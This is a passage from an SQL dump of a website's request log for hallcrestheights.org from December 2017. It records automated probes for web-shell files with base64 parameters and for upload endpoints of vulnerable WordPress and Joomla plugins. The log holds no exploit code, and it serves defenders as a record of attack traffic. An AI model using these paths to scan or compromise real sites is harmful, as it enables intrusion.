00:00:00'),(13178,'http://hallcrestheights.org//goog1es.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:18:50','0000-00-00 00:00:00'),(13179,'http://hallcrestheights.org//wp-admin/about.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:19:22','0000-00-00 00:00:00'),(13180,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=Rk9QTzQzLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:19:37','0000-00-00 00:00:00'),(13181,'http://hallcrestheights.org//update.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:19:53','0000-00-00 00:00:00'),(13182,'http://hallcrestheights.org//news.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:20:10','0000-00-00 00:00:00'),(13183,'http://hallcrestheights.org//SessionController.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:20:26','0000-00-00 00:00:00'),(13184,'http://hallcrestheights.org//maill.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:20:40','0000-00-00 00:00:00'),(13185,'http://hallcrestheights.org//error-log.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:21:13','0000-00-00 00:00:00'),(13186,'http://hallcrestheights.org//M-J!r4ya-F4r3s.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:21:30','0000-00-00 00:00:00'),(13187,'http://hallcrestheights.org//authenticating.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:21:47','0000-00-00 00:00:00'),(13188,'http://hallcrestheights.org//google-assist.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:20:43','0000-00-00 00:00:00'),(13189,'http://hallcrestheights.org//images/google-assist.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:20:59','0000-00-00 00:00:00'),(13190,'http://hallcrestheights.org//images/robots.txt.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:22:37','0000-00-00 00:00:00'),(13191,'http://hallcrestheights.org//yjh.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:22:51','0000-00-00 00:00:00'),(13192,'http://hallcrestheights.org//Ricsky.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:23:09','0000-00-00 00:00:00'),(13193,'http://hallcrestheights.org//elements.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:23:55','0000-00-00 00:00:00'),(13194,'http://hallcrestheights.org//xmlsrpc.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:24:41','0000-00-00 00:00:00'),(13195,'http://hallcrestheights.org//wp-cache.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:24:58','0000-00-00 00:00:00'),(13196,'http://hallcrestheights.org//images/404.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:23:55','0000-00-00 00:00:00'),(13197,'http://hallcrestheights.org//images/head.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:25:32','0000-00-00 00:00:00'),(13198,'http://hallcrestheights.org//cache/support.php?z3=Rk9QTzQzLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:25:48','0000-00-00 00:00:00'),(13199,'http://hallcrestheights.org//RoseLeif.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:26:03','0000-00-00 00:00:00'),(13200,'http://hallcrestheights.org//Abbrevsprl.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:24:57','0000-00-00 00:00:00'),(13201,'http://hallcrestheights.org//show.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:26:34','0000-00-00 00:00:00'),(13202,'http://hallcrestheights.org//images/defau1t.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:26:49','0000-00-00 00:00:00'),(13203,'http://hallcrestheights.org//cli/40dd1d.php?z3=Rk9QTzQzLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:27:04','0000-00-00 00:00:00'),(13204,'http://hallcrestheights.org//bk.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:27:19','0000-00-00 00:00:00'),(13205,'http://hallcrestheights.org//infos.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:27:49','0000-00-00 00:00:00'),(13206,'http://hallcrestheights.org//cache/defau1t.php?z3=Rk9QTzQzLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:28:04','0000-00-00 00:00:00'),(13207,'http://hallcrestheights.org//A.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-12-17 08:28:20','0000-00-00 00:00:00'),(13208,'http://hallcrestheights.org//bookmark.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:28:36','0000-00-00 00:00:00'),(13209,'http://hallcrestheights.org//wp-data.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:29:40','0000-00-00 00:00:00'),(13210,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:29:57','0000-00-00 00:00:00'),(13211,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:30:12','0000-00-00 00:00:00'),(13212,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:30:28','0000-00-00 00:00:00'),(13213,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:30:44','0000-00-00 00:00:00'),(13214,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:30:59','0000-00-00 00:00:00'),(13215,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-12-17 08:31:14','0000-00-00 00:00:00'),(13216,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:30:10','0000-00-00 00:00:00'),(13217,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:30:23','0000-00-00 00:00:00'),(13218,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:31:59','0000-00-00 00:00:00'),(13219,'http://hallcrestheights.org//wp-content/plugins/caches.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:31:08','0000-00-00 00:00:00'),(13220,'http://hallcrestheights.org//head.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:32:45','0000-00-00 00:00:00'),(13221,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:31:56','0000-00-00 00:00:00'),(13222,'http://hallcrestheights.org//wp-content/plugins/morepaddy.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:33:33','0000-00-00 00:00:00'),(13223,'http://hallcrestheights.org//cache/list.php?z3=Rk9QTzQzLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:33:00','0000-00-00 00:00:00'),(13224,'http://hallcrestheights.org//images/interface.php?z3=Rk9QTzQzLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:34:38','0000-00-00 00:00:00'),(13225,'http://hallcrestheights.org//sqldebug.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:33:33','0000-00-00 00:00:00'),(13226,'http://hallcrestheights.org//xmlrpc-activate.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:33:49','0000-00-00 00:00:00'),(13227,'http://hallcrestheights.org//keep.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:35:56','0000-00-00 00:00:00'),(13228,'http://hallcrestheights.org//tmpos.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:36:11','0000-00-00 00:00:00'),(13229,'http://hallcrestheights.org//link.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:36:28','0000-00-00 00:00:00'),(13230,'http://hallcrestheights.org//dcodzu.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:36:43','0000-00-00 00:00:00'),(13231,'http://hallcrestheights.org//codd.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:35:38','0000-00-00 00:00:00'),(13232,'http://hallcrestheights.org//cache/wcache7675n.PHP?z3=Rk9QTzQzLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:37:45','0000-00-00 00:00:00'),(13233,'http://hallcrestheights.org//modules/mod_bookmark/helper.php?z3=Rk9QTzQzLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:38:01','0000-00-00 00:00:00'),(13234,'http://hallcrestheights.org//content.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:38:15','0000-00-00 00:00:00'),(13235,'http://hallcrestheights.org//wp-content/plugins/sfn.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:38:33','0000-00-00 00:00:00'),(13236,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:38:47','0000-00-00 00:00:00'),(13237,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:39:03','0000-00-00 00:00:00'),(13238,'http://hallcrestheights.org//shootmei.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:39:17','0000-00-00 00:00:00'),(13239,'http://hallcrestheights.org//dcodqg.php?z3=Rk9QTzQzLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:40:05','0000-00-00 00:00:00'),(13240,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/FOPO43.php',NULL,'','',1,0,'2017-12-17 08:40:23','0000-00-00 00:00:00'),(13241,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/FOPO43.php',NULL,'','',1,0,'2017-12-17 08:40:31','0000-00-00 00:00:00'),(13242,'http://hallcrestheights.org//wp-content/uploads/FOPO43.php',NULL,'','',1,0,'2017-12-17 08:40:40','0000-00-00 00:00:00'),(13243,'http://hallcrestheights.org//FOPO43.php',NULL,'','',1,0,'2017-12-17 08:40:49','0000-00-00 00:00:00'),(13244,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/FOPO43.php',NULL,'','',1,0,'2017-12-17 08:40:57','0000-00-00 00:00:00'),(13245,'http://hallcrestheights.org//wp-content/plugins/easyrotator-for-wordpress/a.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:56:06','0000-00-00 00:00:00'),(13246,'http://hallcrestheights.org//modules/modules/modules.php?z3=Rk9QTzQzLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:56:37','0000-00-00 00:00:00'),(13247,'http://hallcrestheights.org//wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:56:54','0000-00-00 00:00:00'),(13248,'http://hallcrestheights.org//wp-content/themes/margreetalgra/404.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:57:10','0000-00-00 00:00:00'),(13249,'http://hallcrestheights.org//wp-content/themes/twentyeleven-child/footer.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:57:57','0000-00-00 00:00:00'),(13250,'http://hallcrestheights.org//wp-content/1ndex.php?z3=Rk9QTzQzLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:56:54','0000-00-00 00:00:00'),(13251,'http://hallcrestheights.org//files/files.php?z3=Rk9QTzQzLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-17 08:58:30','0000-00-00 00:00:00'),(13252,'http://hallcrestheights.org/components/com_media/helpers/mark.php',NULL,'http://site.ru','',2,0,'2017-12-17 14:20:15','0000-00-00 00:00:00'),(13253,'http://hallcrestheights.org/sim1.php',NULL,'http://site.ru','',3,0,'2017-12-17 14:24:05','0000-00-00 00:00:00'),(13254,'http://hallcrestheights.org/media/k.php',NULL,'http://site.ru','',1,0,'2017-12-17 14:47:35','0000-00-00 00:00:00'),(13255,'http://hallcrestheights.org/robotobum.ru/tmp/system_infos.php',NULL,'http://site.ru','',1,0,'2017-12-17 15:20:39','0000-00-00 00:00:00'),(13256,'http://hallcrestheights.org/modules/mod.php',NULL,'http://site.ru','',4,0,'2017-12-17 15:52:41','0000-00-00 00:00:00'),(13257,'http://hallcrestheights.org/templates/atomic/cutia.php',NULL,'http://site.ru','',2,0,'2017-12-17 15:56:32','0000-00-00 00:00:00'),(13258,'http://hallcrestheights.org/components/com_user/views/reset/mod.php',NULL,'http://site.ru','',3,0,'2017-12-17 16:23:33','0000-00-00 00:00:00'),(13259,'http://hallcrestheights.org/media/mod.php',NULL,'http://site.ru','',4,0,'2017-12-17 17:50:38','0000-00-00 00:00:00'),(13260,'http://hallcrestheights.org/templates/beez5/index.php',NULL,'http://site.ru','',3,0,'2017-12-17 18:21:47','0000-00-00 00:00:00'),(13261,'http://hallcrestheights.org/components/com_banners/models/mod.php',NULL,'http://site.ru','',4,0,'2017-12-17 21:28:18','0000-00-00 00:00:00'),(13262,'http://hallcrestheights.org/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'','',6,0,'2017-12-19 13:51:54','0000-00-00 00:00:00'),(13263,'http://hallcrestheights.org/wp-content/plugins/gallery-plugin/upload/php.php',NULL,'','',4,0,'2017-12-19 13:52:06','0000-00-00 00:00:00'),(13264,'http://hallcrestheights.org/wp-content/plugins/font-uploader/font-upload.php',NULL,'','',3,0,'2017-12-19 13:52:08','0000-00-00 00:00:00'),(13265,'http://hallcrestheights.org/wp-admin/admin-post.php',NULL,'','',9,0,'2017-12-19 13:52:19','0000-00-00 00:00:00'),(13266,'http://hallcrestheights.org/wp-content/plugins/cardoza-facebook-like-box/cardoza_facebook_like_box.php',NULL,'','',6,0,'2017-12-19 13:52:25','0000-00-00 00:00:00'),(13267,'http://hallcrestheights.org/wp-content/plugins/contus-hd-flv-player/uploadVideo.php',NULL,'','',2,0,'2017-12-19 13:52:25','0000-00-00 00:00:00'),(13268,'http://hallcrestheights.org/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2017&Month=12',NULL,'','',2,0,'2017-12-19 13:52:42','0000-00-00 00:00:00'),(13269,'http://hallcrestheights.org/wp-content/plugins/google-maps-by-daniel-martyn/inuse.php',NULL,'','',4,0,'2017-12-19 13:52:53','0000-00-00 00:00:00'),(13270,'http://hallcrestheights.org/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php',NULL,'','',4,0,'2017-12-19 13:53:07','0000-00-00 00:00:00'),(13271,'http://hallcrestheights.org/wp-content/plugins/mailpress/mp-includes/action.php',NULL,'','',3,0,'2017-12-19 13:53:14','0000-00-00 00:00:00'),(13272,'http://hallcrestheights.org/wp-content/plugins/sharexy/ajaxresponder.php',NULL,'','',4,0,'2017-12-19 13:51:56','0000-00-00 00:00:00'),(13273,'http://hallcrestheights.org/wp-content/plugins/php-event-calendar/server/file-uploader/',NULL,'','',3,0,'2017-12-19 13:52:00','0000-00-00 00:00:00'),(13274,'http://hallcrestheights.org/wp-content/plugins/simple-dropbox-upload-form/dragup/',NULL,'','',5,0,'2017-12-19 13:53:23','0000-00-00 00:00:00'),(13275,'http://hallcrestheights.org/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'','',3,0,'2017-12-19 13:52:17','0000-00-00 00:00:00'),(13276,'http://hallcrestheights.org//wp-content/plugins/real3d-flipbook/includes/process.php',NULL,'','',1,0,'2017-12-19 13:52:23','0000-00-00 00:00:00'),(13277,'http://hallcrestheights.org/wp-content/plugins/dzs-portfolio/admin/upload.php',NULL,'','',6,0,'2017-12-19 13:56:26','0000-00-00 00:00:00'),(13278,'http://hallcrestheights.org/wp-content/plugins/dzs-videogallery/admin/upload.php',NULL,'','',4,0,'2017-12-19 13:56:52','0000-00-00 00:00:00'),(13279,'http://hallcrestheights.org/wp-content/plugins/dzs-videogallery/upload.php',NULL,'','',6,0,'2017-12-19 13:57:14','0000-00-00 00:00:00'),(13280,'http://hallcrestheights.org/wp-content/plugins/codecanyon-157782-video-gallery-wordpress-plugin-w-youtube-vimeo-/admin/upload.php',NULL,'','',5,0,'2017-12-19 13:56:26','0000-00-00 00:00:00'),(13281,'http://www.hallcrestheights.org/oiyizgol-i20162633-k29141-rcmw-fbsnopd-gfnhskrl/',NULL,'','',1,0,'2017-12-22 01:47:22','0000-00-00 00:00:00'),(13282,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-vtzpx-i20162632-bxkc-k50189-wjybtyl/',NULL,'','',1,0,'2017-12-22 02:19:33','0000-00-00 00:00:00'),(13283,'http://hallcrestheights.org/components/com_b2jcontact/b2jcontact.php',NULL,'','',2,0,'2017-12-23 10:50:38','0000-00-00 00:00:00'),(13284,'http://hallcrestheights.org/modules/mod_ppc_simple_spotlight/elements/upload_file.php',NULL,'','',1,0,'2017-12-28 02:04:28','0000-00-00 00:00:00'),(13285,'http://hallcrestheights.org/inl.php',NULL,'hallcrestheights.org','',1,0,'2017-12-29 11:01:10','0000-00-00 00:00:00'),(13286,'http://hallcrestheights.org/images/ws.php',NULL,'hallcrestheights.org','',1,0,'2017-12-29 11:05:10','0000-00-00 00:00:00'),(13287,'http://hallcrestheights.org/wp-help.php',NULL,'hallcrestheights.org','',2,0,'2017-12-29 11:05:37','0000-00-00 00:00:00'),(13288,'http://hallcrestheights.org/index.php?option=com_b2jcontact',NULL,'','',7,0,'2017-12-30 01:28:04','0000-00-00 00:00:00'),(13289,'http://hallcrestheights.org/&wd=test',NULL,'http://www.baidu.com/s?wd=HGW','',9,0,'2017-12-30 08:55:33','0000-00-00 00:00:00'),(13290,'http://hallcrestheights.org/images/1ndex.php?z3=b0I2a0FqLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:33:56','0000-00-00 00:00:00'),(13291,'http://hallcrestheights.org/cache/cachee.php?z3=b0I2a0FqLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-12-30 21:39:49','0000-00-00 00:00:00'),(13292,'http://hallcrestheights.org/maill.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:41:14','0000-00-00 00:00:00'),(13293,'http://hallcrestheights.org/wp-cache.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:41:19','0000-00-00 00:00:00'),(13294,'http://hallcrestheights.org/robot.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-12-30 21:42:26','0000-00-00 00:00:00'),(13295,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:42:27','0000-00-00 00:00:00'),(13296,'http://hallcrestheights.org/SessionController.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:42:35','0000-00-00 00:00:00'),(13297,'http://hallcrestheights.org/webconfig.txt.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:42:45','0000-00-00 00:00:00'),(13298,'http://hallcrestheights.org/robots.txt.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:43:29','0000-00-00 00:00:00'),(13299,'http://hallcrestheights.org/sql_dump.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:43:40','0000-00-00 00:00:00'),(13300,'http://hallcrestheights.org/jconfig.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:43:44','0000-00-00 00:00:00'),(13301,'http://hallcrestheights.org/thumb.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:44:07','0000-00-00 00:00:00'),(13302,'http://hallcrestheights.org/al277.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:47:01','0000-00-00 00:00:00'),(13303,'http://hallcrestheights.org/images/al277.php?z3=b0I2a0FqLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:45:43','0000-00-00 00:00:00'),(13304,'http://hallcrestheights.org/wsdl.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:45:46','0000-00-00 00:00:00'),(13305,'http://hallcrestheights.org/wp-data.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:47:10','0000-00-00 00:00:00'),(13306,'http://hallcrestheights.org/media/1ndex.php?z3=b0I2a0FqLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:46:57','0000-00-00 00:00:00'),(13307,'http://hallcrestheights.org/media/tmp.php?z3=b0I2a0FqLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:48:23','0000-00-00 00:00:00'),(13308,'http://hallcrestheights.org/google-assist.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:48:42','0000-00-00 00:00:00'),(13309,'http://hallcrestheights.org/images/google-assist.php?z3=b0I2a0FqLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-12-30 21:49:41','0000-00-00 00:00:00'),(13310,'http://hallcrestheights.org/elements.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:48:22','0000-00-00 00:00:00'),(13311,'http://hallcrestheights.org/cache/defau1t.php?z3=b0I2a0FqLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:49:47','0000-00-00 00:00:00'),(13312,'http://hallcrestheights.org/roubt.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:49:50','0000-00-00 00:00:00'),(13313,'http://hallcrestheights.org/bookmark.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:49:54','0000-00-00 00:00:00'),(13314,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-12-30 21:52:12','0000-00-00 00:00:00'),(13315,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:52:14','0000-00-00 00:00:00'),(13316,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:56:35','0000-00-00 00:00:00'),(13317,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 21:58:39','0000-00-00 00:00:00'),(13318,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:04:41','0000-00-00 00:00:00'),(13319,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:03:29','0000-00-00 00:00:00'),(13320,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:04:54','0000-00-00 00:00:00'),(13321,'http://hallcrestheights.org/sqlbak.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-12-30 22:06:04','0000-00-00 00:00:00'),(13322,'http://hallcrestheights.org/email.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-12-30 